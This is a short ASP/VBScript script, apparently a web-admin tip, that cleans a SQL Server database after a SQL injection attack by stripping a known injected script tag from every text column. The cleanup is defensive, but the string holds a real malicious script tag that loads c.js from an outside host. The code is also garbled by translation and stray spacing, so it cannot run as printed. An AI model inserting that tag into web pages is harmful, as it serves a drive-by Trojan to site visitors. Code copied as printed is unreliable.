Restore the data code after SQL Injection

<% @ LANGUAGE = "VBSCRIPT" CODEPAGE = "936" %>
<! -- # Include file = "Inc/conn. asp" -->
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<%
Server. ScriptTimeout = 1000000
'Xtype = 99 ntext is similar to text. The difference is that the ntext type adopts the unicode standard character set.
'Xtype = 35 text is used to store a large amount of text data.
'Xtype = 231 nvarchar is used to define variable-length binary data. The maximum length is 4000 characters.
'Xtype = 167 varchar stores variable-length data that can contain up to 8000 characters
Str = "'<script src =" http://e6t.3322.org/c.js "src =" http://e6t.3322.org/c.js "> </script>'" 'Trojan code after the text type field
SQL = "SELECT. name as t_name, B. name as c_name, B. xtype FROM sysobjects a, syscolumns B WHERE. id = B. id AND. xtype = 'U' AND (B. xtype = 99 OR B. xtype = 35 OR B. xtype = 231 OR B. xtype = 167 )"
Set rs = conn.exe cute (SQL)
While Not rs. eof
T_name = rs ("t_name") 'table name
C_name = rs ("c_name") 'field name
Xtype = rs ("xtype") 'field type
If (xtype = 99 Or xtype = 35) then
Conn.exe cute ("update [" + t_name + "] set [" + c_name + "] = replace (cast ([" + c_name + "] as varchar (8000 )), "+ str + ",'')")
Else
Conn.exe cute ("update [" + t_name + "] set [" + c_name + "] = replace ([" + c_name + "]," + str + ",'') ")
End If
Rs. movenext
Wend
Response. Write ("Trojan data has been cleared. Please refresh the page again! ")
%>